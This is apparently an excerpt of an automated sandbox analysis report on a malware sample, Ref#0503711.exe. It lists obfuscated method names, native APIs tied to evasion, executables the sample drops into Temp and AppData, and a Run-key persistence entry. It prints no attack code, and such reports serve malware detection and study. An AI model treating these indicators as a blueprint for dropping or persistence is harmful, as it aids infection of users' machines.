                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, Iv7hZpiOLYfSOeVp1bm.csHigh entropy of concatenated method names: 'jnniE08snD', 'BaaiZEBjj4', 'coaiqatIuV', 'WPoiKyb69j', 'Ie7iGpUsXg', 'ph2ilgWcCO', 'vSSieFWTdU', 'LHgih1WRQj', 'QQ7iW9uleZ', 'Ei2ijlyOOy'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, EmY1EtSPxjiKB1DtBQw.csHigh entropy of concatenated method names: 'ICoSHYTwmE', 'kB2SFBPrjd', 'NciS4xQDsp', 'GcBSRgOQbb', 'rqHS5IoTMH', 'LvEp52Czis4LvC0Q0yA', 'A7pwFiDuFqSnosfjf7I', 'HJNh8jDv66XqMprcZQG', 'RqtFsoDbs7F21NTby6s', 'bBHQxODJ6BomIUwFGYB'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, vqbwCgd2VQ2xTN0p73i.csHigh entropy of concatenated method names: 'ISadDHg4Wg', 'p04kApHYuHgabZMwqVD', 'CaYxI1H6eqXUF7ZuoVW', 'CALrsPHTSX6oTts7KJK', 'YSF6A8H7kidqZPBlnJs', 'mpwv66HR4EQqRI2dqNk', 'dHNxjCH5E8G8KUiWvUZ'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, WFtcYaSYUKalxjEXaMm.csHigh entropy of concatenated method names: 'AyjSTVCWTB', 'lH2S7Mbbxd', 'dJMS1KZkiA', 'g6Dh72D6Ax5KHdnnCoi', 'I6YFGVDT7BxSjH8erpj', 'fyfNT6D7vdFP7intqQc', 'cThnTMD5jNBOVwjUUok', 'flXMWvDYuWrEGF7j6su', 'kRG2hLD1LiMlIt235KM', 'ylHJPMD0Spbh1ffoMjs'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, CgEusWNzJJUCKRCMbEb.csHigh entropy of concatenated method names: 'HmtlpmJbSQ', 'WNll9fDY6X', 'cjclVv6qSA', 'kqml2TxbTC', 'HZjlCiewP9', 'OOvlDU9OBt', 'JN5lmDN8GX', 'aQfZy1HKDd', 'YfjltFG5q9', 'avhlP70UZr'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, C3gm0NS9TwrQ4wjHHar.csHigh entropy of concatenated method names: 'ELdS2UeZ1l', 'WZcSCmlR0O', 'tPsojbC1TicxGLCQAlY', 'm2ns16C0OmwCnE6BeDp', 'V85WSWCnwuBoiVKeObT', 'i6YsEkCf2IIdDs3bTxM', 'S5Et4LCgjSgZuH88I4j', 'p08c0ACQUdnr7SpvRkU', 'Yahbr1CwMm0BLjE9Dhe'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, iTm8L9OovmtpJBFSxrU.csHigh entropy of concatenated method names: 'UaDOkWgTT3', 'QvfLsraygGQXN9YRJe1', 'QYN2iIapeAsnfvDrFn6', 'ufUrrSa998AeN4RZS3E', 'EhmkjhaVQOw64YLUoXM', 'bP9Z4Ha2i5P06H5pgsI', 'AZ9nXVaCJ7EHp8KMMbV', 'cMVVKNaDc2sT6vyVGj8', 'HSRHRlajqBNZErLoHH1', 'XdveX5arJ96rgpl3Y8r'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, LIN6BXOBYop2Ew2kjVF.csHigh entropy of concatenated method names: 'zGAOznUn4j', 'TbCdvY9Ysi', 'fC4dua6PRm', 'rswqNuaaKQKnFrDGTSW', 'A45yBdaH6c3ccgkuPGf', 'sY19gLatjhodfjLPpBD', 'UYlQ80aPRQdI4qjUySV', 'BQZFJpaFV3cOYVUB3bT', 'vwTuWLa4sWN7I3FlXFB', 'JHP2vGaRCwOxCbOSjtd'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, acqpLLdygutBcaWGBUX.csHigh entropy of concatenated method names: 'd4Fd97Zxbe', 'jNDdVkdvLo', 'Ub5Ll5Htx6S5yNko74U', 'y6lSpdHP2iKcbElehwo', 'BMSumvHDysTEweSFlQ6', 'Hb0lpSHmYD910sR2JIB', 'QD0au6HaWXK2M0AxkQY', 'CHPkGHHHkV1tN3XskZ2', 'ORQYLyHFCfuD1GDq8oN'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, Q4CgRbNRpVDRJSuRcf9.csHigh entropy of concatenated method names: 'TdaNwusGbW', 'flWN33W0Tj', 'iyhN8pEbAh', 'haaNXhae0j', 'guTNInfdbN', 'xMONocJMY3', 'PEoNcOn5lf', 'O80Nkn42mb', 'WUZNBtTTOc', 'WTUNAj2hIr'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, SpbxoereoKyUhOJW9F.csHigh entropy of concatenated method names: 'Ownp86Ktg', 'ufA9o4SGW', 'DC22V0GMD', 'rJgVFgind', 'GDQHyw2SjmHKW0fXhxM', 'DGQhun2iFujY1V2bhv6', 'AHkMXN2s89UQe2g92L4', 'OpMFMu2LSa0Js4W0dSZ', 'EHwW0U2O0IR3TeR9XPG', 'qeGKc72Jd7AUm7GYNXs'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, xPUceZiaJq5d1uh9UQG.csHigh entropy of concatenated method names: 'pMPi6qvaJB', 'U0tgRDmzyRbcgY9k5ih', 'd5WfDbtuhgUUTV4436T', 'EhIDgUmBrOjXtwL0c0y', 'EbFeYamA6tTSH303B76', 'bhc9Vhm8vwpFf6ixZBy', 'UVccM3mX1CTguyBleJf'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, v64a2TOa9ZrgLPu1Kyn.csHigh entropy of concatenated method names: 'pPSOFAVdIe', 'NWYO45NXFC', 'rxMh3jPUn4iVeOTn4pM', 'K7QpQFPqMZHJGrlVSrw', 'R9ZOdtPxFoTAv7kYefC', 'TtcMCxPKMvxXhtPCbF8', 'pMPkCpPG41TOMGLejuN', 'LJHTvrPlxsKXN33AWBq', 'dkKoY9PepehRDYmrZHp', 'bcZEyFPhOO7GqlqDlVv'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, PLDep8Om9ArKd9wLlFt.csHigh entropy of concatenated method names: 'tNkOPwkGdX', 'daEmw5PsK9hBtkwN6Lt', 'FVLjq3PLQOxCd3HuJGD', 'nKb2UlPOmySqs684dE5', 'aBVwSmPdx2JnUBbMBdU', 'Fv9rjMPEudtEG9OHFWw', 'JKbn0qPNJbcIgsd1mX1', 'VfwwBJPSWc2PljWqBLF', 'vmmMpmPiWyklRhxoyLY'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, sYjtawd4K2M2MYpuPvh.csHigh entropy of concatenated method names: 'vipVKKF1LaEHCnNbH7K', 'ShyKYQF08rEO25lPxVf', 'hLoNN5nlXk', 'aQ81MCFQ2AkeIPwb5cu', 'BsQJSiFwLQ0rg3aDLE7', 'oYU5ejF33uiO42mt1id', 'WtUNirF8onZi3NmtHP2', 'LGJSs0FXQ2Mv3V3q9Pm', 'iLp0OZFITs2SjGA56YU', 'PY6nCrFotfoOZokrFUU'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, MLbCVQdG2K75TIZp2T7.csHigh entropy of concatenated method names: 'CcEdeDClcp', 'TI0dhOCucT', 'kXpsWLHbEcZwqb4f0Aw', 'T9YiYHHJQrgBYIef4Kf', 'uJvaGuHMxatnbIRKkjS', 'YdDwmAHuCeKLXA75EN3', 'pJb7anHvQroLhn1Ib9G', 'klvXJtHS2JBIcDF4TnE', 'M4NeugHi8pUxo1Yw4NO', 'UxOZcmHsPkmp6kMbQi4'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, v5Bi7mdJHDtycDxIQnT.csHigh entropy of concatenated method names: 'D5kdSZwNko', 'hFEdirA2xk', 'o8qdL30rby', 'j4bsjgaTkAfsdSoQHox', 'ITqMG5aY7YbjEPhfLae', 'elr30Wa6vpMC9MNIHvR', 'Ium8HMa7TcowObKlE5D', 'P7eNW6a1T5UW9hwKu4S'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, QQ3beRddoYX4CnPXHDZ.csHigh entropy of concatenated method names: 'fxtdNbFNDh', 'pHdMkuagA6Sfa2RA70p', 'WcBMEYaQrTIR2RJBPbn', 'T7h5YoawkgFxEc9GZCy', 'o7qNMra3jT3QVuDiaQu', 'zFGIIca8PHVDx7i4hbi', 'uSO7wGaXuACOY19hXxN', 'atJqAEanDfhsufJG4at', 'TvdCBIafj1yq4Z6RNTF'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, KgaJdhi9yCnBKYwNKut.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'LH0i2xwXK5', 'NtProtectVirtualMemory', 'jWJG39m7SaPVsfau3UY', 'hyQXBnm6HbCDuR2bThv', 'FH6oMJmTTaDuFtyqEYp', 'ui0Wl7m1Xh2V2otOOqg'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, pOjlZUO6j8JIEeA6kRx.csHigh entropy of concatenated method names: 'l0eO0GrXy6', 'IykOns2FFP', 'RekO7lrEHi', 'F0iO1fwlGg', 'ebEPXjPB5AI6TW18TY2', 'O3cYMBPA4A5HwEfAmBp', 'lNgIrePzMp9bw2KgYRW', 'SB0iREauToLDk4nFL9W', 'wSbtGKPcQYPov1wCRrc', 'w9pbrTPkLuRk67O4qK9'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, avpuerSgeS18BbJq9ck.csHigh entropy of concatenated method names: 'X6ASw2qqP0', 'FWQIHfDBItsOi69jOtj', 'AGrNHrDAArFNmoMZZbQ', 'fiUhgVDzkQSu8KLp4nl', 'cXB5StDcLCEbUBXRLNl', 'l2C95MDkPMal2GKU24n'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, s9ff3sZMQkg7L1FZn2.csHigh entropy of concatenated method names: 'vxVxdFI2A', 'tCvKJR6Wp', 'DYBlr7Jug', 'wPCeXUx7P', 'sxlqimZKX', 'xZDmFfVoP9xpNiU0m5d', 'bVhm9oVcdMREYTOQQq7', 'X1i8ARVkGgF6edVU3sW', 'DN8ClSVBa7dGWqZivxU', 'obnQbiVA5Oe9ycaD0iQ'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, uaA9QNdWt3jZu7Bduex.csHigh entropy of concatenated method names: 'o5UdrVm8Gu', 'GhhiaaHWeO5ovlIFaID', 'OUwaq4HjvZOywOmjjK9', 'BcS5qKHrvDHjX2vR7Bf', 'CqdwCqHydvN9sovM5Vd', 'kTgM0rHpq0VqN4458Se', 'cGx9E1H9MOF5bw8xWik', 'h60jHEHVbAbqHvtTo2T', 'jmkRtBH2w1vB4eZQaVU', 'xPOD0GHeNmIQErlNaOX'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, zATojbbpjXD8F78DRWL.csHigh entropy of concatenated method names: 'ThgbVi7ve0', 'yevGf72T8rxxuLeRvxn', 'SablPs27E3r2EqjUlQO', 'NmpRKZ21w3ughxqxw72', 'SbRZQs20R4LpcIM0oHx', 'otjo6N2nkTSIUkv3GGC', 'NljxXd2fnMR9xNyUJXN', 'moYf9C2gwXllkl3V8Hd', 'oai4N72Q0dZVulBhf9O', 'sdBC6r2we0mNkCynlor'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, e6iAQUOQYmctIjmG0M8.csHigh entropy of concatenated method names: 'UdUO3XYiJf', 'kG336oaiujtVu7grX7K', 'VNxUkqasYr3OP2uufZd', 'kkU9PraL0a1DJXj58gl', 'rmB4n2aOshgpkk4KwcA', 'JiBn74adytRC7jGl3oH', 'OmA66baEQIs3TXxKPin', 'pKwTLBaNZv1hGDtv2r4', 'n3LEt4aZDb6GeAaQele', 'a2VJ6naUva9hlCJL2D8'
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, O9SOTCdPTdh88TV31Fm.csHigh entropy of concatenated method names: 'QMN73nmJl7', 'P9wHdMFPiotJ1W5noM6', 'r1jvHuFavYw4vtEhiic', 'j9df3gFHS931Vh744FL', 'UuO8kVFFo8eVGSx1rTx', 'oQbMDiF4RnhlaFjpIoS', 'xcvVc5FmwOBfwfIhQoO', 'jpnmhDFtc8S0LCcRnfq', 'la4sxlFRgxPMu6jlLVm', 'snwT0yF5R0FCxqpMpAm'
                      Source: C:\Users\user\Desktop\Ref#0503711.exeFile created: C:\Users\user\AppData\Local\Temp\docdd.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Ref#0503711.exeFile created: C:\Users\user\AppData\Roaming\ioibrzb.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Ref#0503711.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ioibrzbJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ioibrzbJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#0503711.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
